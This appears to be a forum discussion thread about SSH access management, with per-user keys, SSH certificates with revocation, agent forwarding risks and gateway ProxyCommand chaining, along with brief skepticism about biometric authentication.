I look at biometrics as just another category of the 2nd factor: things you have.

You have your fingers. You have your eyes.

In fiction and movies, these are things you have that can be taken from you (your fingers severed, your eyes plucked out) and used to get past biometric scanners.

In real life there are easier, stealthier, and less gruesome methods for getting those things: just copy them. (gummy bear fingerprints, anyone? [1][2][3])

[1] - http://www.theregister.co.uk/2002/05/16/gummi_bears_defeat_f...

[2] - http://www.cryptome.org/gummy.htm

[3] - http://www.it.slashdot.org/story/10/10/28/0124242/aussie-kid...

Unfortunately biometrics are next to useless for remote authentication. The only context in which biometrics work is when the whole authentication chain (reader, cable, computer, network) is tamper-proof. When one of these elements can be tampered with (e.g. unplugging the fingerprint reader and sniffing the USB traffic), it becomes "something you know, that anyone can collect, that you can reproduce with an HD picture, and that you cannot revoke without losing your physical integrity".

I think biometrics may have a place in tamper-proof devices like iphones (infamous error 53) or biometric smartcards (need fingerprint to unlock secrets).

Org question. We use a shared key and a shared account to manage our servers. When someone leaves the team we have to regenerate the key for the account. I'm sure this isn't recommended, so what's a good way to manage SSH access in a team setting? I'd like to avoid sharing the key so that access can be revoked from one user without regenerating the key for everyone.

Have each team member generate their own key. Collect everyone's public key in a folder and have a script that generates an authorized_keys file from them. Use Puppet or Chef (or anything else) to push the authorized_keys to every server.

A single shared key is a security disaster waiting to happen.
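The generator script can be as simple as the following sketch (directory layout and names invented; the demo creates its own sample keys):

```shell
#!/bin/sh
set -eu

# Demo setup: in reality this directory holds one .pub file per teammate.
keydir=$(mktemp -d)
echo 'ssh-ed25519 AAAAexample1 alice@laptop' > "$keydir/alice.pub"
echo 'ssh-ed25519 AAAAexample2 bob@laptop'   > "$keydir/bob.pub"

# Concatenate every key, tagging each entry with its origin for auditing.
out="$keydir/authorized_keys"
: > "$out"
for key in "$keydir"/*.pub; do
    printf '# from %s\n' "${key##*/}" >> "$out"
    cat "$key" >> "$out"
done
cat "$out"
```

Revoking someone's access is then just deleting their .pub file and re-running the deploy.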

did you read the article? ssh certificates with revocation are a much more workable solution

I wrote the article.

There's the up-front cost of setting them up, and perhaps tool support (pubkey/agent auth is widely supported; X.509...not so much).

ssh certificates are not x.509, though they are designed around a PKI.

Thanks for the correction.

SSH actually supports the usage of certificates that you can use to sign individual keys with a finite lifetime and key revocation. For some reason, very few people know about this and assume SSL/TLS whenever you say "certificates".

You can read about this in the `CERTIFICATES` section of ssh-keygen(1).
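A rough sketch of that workflow, per the flags in ssh-keygen(1) (all key and identity names here are invented):

```shell
# Scratch directory with throwaway keys for the demo.
cd "$(mktemp -d)"

# The CA keypair -- in real use, generate once and keep the private half offline.
ssh-keygen -t ed25519 -f ca_key -N '' -q

# A user's ordinary keypair.
ssh-keygen -t ed25519 -f alice_key -N '' -q

# Sign alice's public key: cert id "alice-laptop", principal "alice", valid 1 week.
ssh-keygen -s ca_key -I alice-laptop -n alice -V +1w alice_key.pub

# Inspect the certificate (written to alice_key-cert.pub).
ssh-keygen -L -f alice_key-cert.pub
```

On the server side you would point `TrustedUserCAKeys` at the CA's public key and list revoked keys/certs in a `RevokedKeys` file (see sshd_config(5)).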

We have a shared account to manage servers as well. However, the individuals still have individual accounts, and individual SSH keys. They log in as themselves, and `sudo -iu` into the shared user. This can be done without giving the user root (i.e., sudo supports only giving access to the shared account).

It's still not a great setup, because it makes auditing a nightmare. (Unfortunately, a particular software package we use essentially requires it due to its bad architecture.)
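For reference, the sudoers rule for that pattern looks roughly like this (group and account names invented):

    # /etc/sudoers.d/shared-app: members of "ops" may become "appuser" only
    %ops ALL = (appuser) ALL

Then `sudo -iu appuser` works for ops members without granting them general root.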

> f=$(mktemp) && ssh-keyscan korell > $f && ssh-keygen -l -f $f && rm $f

> Unfortunately ssh-keygen does not support input from stdin, so this example is slightly more complicated than it should.

Any shell that supports process substitution can fix this for you with something like:

ssh-keygen -l -f <(ssh-keyscan korell)

How about https://github.com/ccontavalli/ssh-ident ? Is that still a "best practice", since the author doesn't mention it in this blog entry?

I didn't know that tool. Having different agents for different projects may be useful, especially if you're using Agent Forwarding.

I don't like that you have to alias ssh or replace /usr/xxx/bin/ssh with a symlink to make it work.

Great post!

BTW, you can also now use hardware devices (like TREZOR and KeepKey) to perform "ssh-agent" functionality in hardware, with minimal setup work.

Blog post: https://medium.com/@satoshilabs/trezor-firmware-1-3-4-enable...

Source code: https://github.com/romanz/trezor-agent (the README has several demo screencasts).

I remember reading about a tool Instagram used for SSH management, but that might not be a "best practice". (http://instagram-engineering.tumblr.com/post/11399488246/sim...)

And yet we still see things like https://blog.binaryedge.io/2015/11/10/ssh/

It would be cool to have a `forward agent connection once` option in ssh, for when I know I'll have to `git pull` once on the server but don't need agent forwarding after that.

>Do not SSH cross-server

This doesn't make sense. You can safely set up SSH agent forwarding to ssh from server to server without storing your ssh private key anywhere but your local host.

If the server you're forwarding your agent to is compromised it can now talk to your agent. This point could also be 'assume gateway servers are compromised'.

If your gateway servers are compromised to this degree you have a much larger problem than your ssh agent being compromised.

But the article suggests to use ssh-agent.

Has anyone used ProxyCommand to chain through 2 or more gateways and has a config example to show?

I had one a long time ago, from before ssh -W, which I updated for the occasion:

Host *+*

ProxyCommand ssh -W $(echo %h | sed 's/^.*+//') $(echo %h | sed 's/+[^+]*$//;s/\([^+%%]*\)%%\([^+]*\)$/\2 -l \1/;s/:\([^:+]*\)$/ -p \1/')

Use with:

$ ssh login1%host1:port1+login2%host2:port2+login3%host3:port3+host4:port4 -l login4

What amazes me about these articles is that they keep recommending NOT to use password-based logins for SSH: Why are people still using that?

People are still using FTP, for what it's worth. In other words, the same old: ignorance ("we've always done it like this") and/or apathy ("meh, we're not a cracker target").

Still a big fan of the BetterCrypto guide: https://bettercrypto.org/

I'm not sure what there is to recommend about this Applied Crypto Hardening guide, which seems to be in draft form. The section on SSH is just a couple of snippets from sshd config files with no explanation of the parameter choices. And copy-pasting config file snippets from a random guide hardly constitutes security best practice.
